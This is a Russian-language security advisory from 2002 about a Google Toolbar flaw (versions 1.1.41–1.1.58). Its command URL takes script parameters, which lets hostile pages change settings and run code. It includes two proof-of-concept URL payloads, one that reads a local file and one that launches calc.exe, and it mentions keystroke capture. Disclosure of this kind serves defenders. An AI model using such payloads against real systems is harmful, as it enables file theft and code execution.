Изменение конфигурации и выполнение произвольного кода в Google Toolbar

Дата публикации:
13.08.2002
Всего просмотров:
818
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Google Toolbar - ActiveX control для Microsoft Internet Explorer, который обеспечивает функциональность поисковой системы Google.

Обнаруженная уязвимость позволяет изменять параметры настройки конфигурации, посещая определенный URL (http://toolbar.google.com/command?), который принимает команды как CGI параметры. Злонамеренный сценарий может непосредственно обратиться к этому URL, переадресовывая на страницу, которая ссылается на доверенный сайт, типа домена google.com. Уязвимость позволяет изменить конфигурацию панели инструментов, и выполнять произвольный код в пределах Local System security zone. Пример:

1. Чтение локальных файлов:

"http://toolbar.google.com/command?script=document.body.insertAdjacentHTML
('beforeEnd','<iframe id=oFileRead src=file://c:/test.txt></iframe>'); setTimeout
(function () { alert(oFileRead.document.documentElement.innerText) },1000)"
2. Выполнение произвольных программ:
"http://toolbar.google.com/command?script=document.body.insertAdjacentHTML
('beforeEnd','<object classid=clsid:10101010-1111-1111-1111-111111111111 
codebase=c:/winnt/system32/calc.exe style=display:none></object>')".
и т.п. Также сообщается, что в некоторых версиях Google keypress события посылаются основному окну браузера. Злонамеренный сценарий в текущем окне браузера может контролировать нажатие клавиш.

уязвимость обнаружена в Google Toolbar 1.1.41- 1.1.58

Ссылки: Exploiting the Google toolbar (GM#001-MC)